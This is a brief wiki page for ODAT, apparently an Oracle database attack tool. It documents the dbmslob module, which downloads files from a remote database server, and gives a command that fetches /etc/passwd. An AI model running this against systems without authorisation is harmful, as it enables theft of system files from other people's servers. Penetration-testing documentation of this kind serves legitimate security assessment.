Skip to content
quentinhardy edited this page Mar 24, 2016 · 2 revisions

Download files

This module uses the DBMS_LOB Oracle library to download files remotely.

  • To download the passwd file stored in /etc/ to the tmp.txt local file:
./odat.py dbmslob -s $SERVER -d $SID -U $USER -P $PASSWORD --getFile '/etc/' 'passwd' 'temp.txt'
Clone this wiki locally